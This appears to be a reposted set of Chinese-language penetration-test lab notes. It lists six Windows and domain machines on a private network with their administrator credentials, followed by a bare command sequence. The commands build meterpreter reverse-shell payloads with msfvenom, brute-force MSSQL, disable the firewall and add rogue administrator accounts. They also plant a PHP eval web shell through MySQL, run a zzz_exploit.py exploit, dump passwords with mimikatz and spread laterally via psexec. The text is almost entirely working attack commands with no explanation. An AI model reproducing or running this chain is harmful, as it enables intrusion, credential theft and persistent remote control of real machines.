1号
账号:Administrator
密码:[email protected][email protected]#
ip:192.168.141.111
2号
账号:ADMIN-PC/ADMIN
密码:123456hhhh.
222.18.158.244:7771
ip:192.168.141.138
3号
域名:hiro.com
管理员
账号:hiro\administrator
密码:hb123456,./$
域用户
账号:hiro.com/user1
密码:hb123456,./$
ip:192.168.141.100
Tips:里面设了静态ip,要改一下,已将加入过程总结
https://www.jianshu.com/p/2708f3dfb7cf
4号
账号:administrator
密码:[email protected]
ip:192.168.141.114
5号
账号:Administrator
密码:[email protected]
ip:192.168.141.115
6号
账号:Administrator
密码:Edvison233!
ip:192.168.141.116
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
nmap -p1433 --open 192.168.141.0/24
nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116
netsh firewall set opmode mode=disable
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
net user Waldo6TEST 1234567hhhh. /add
net localgroup administrators Waldo6TEST /add
http://192.168.141.115/phpmyadmin/
use mysql;
CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');
SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';
net user Waldo 1234567hhhh. /add
net localgroup administrators Waldo /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe
msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 6666
exploit
python zzz_exploit.py 192.168.141.114
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
privilege::debug
sekurlsa::logonpasswords
net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"
net use z: \\192.168.141.100\c$
copy shell.exe \\192.168.141.100\c$
psexec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."
net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"
net use z: \\192.168.141.111\c$
copy shell.exe \\192.168.141.111\c$
psexec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe
转自:潇湘信安
热文推荐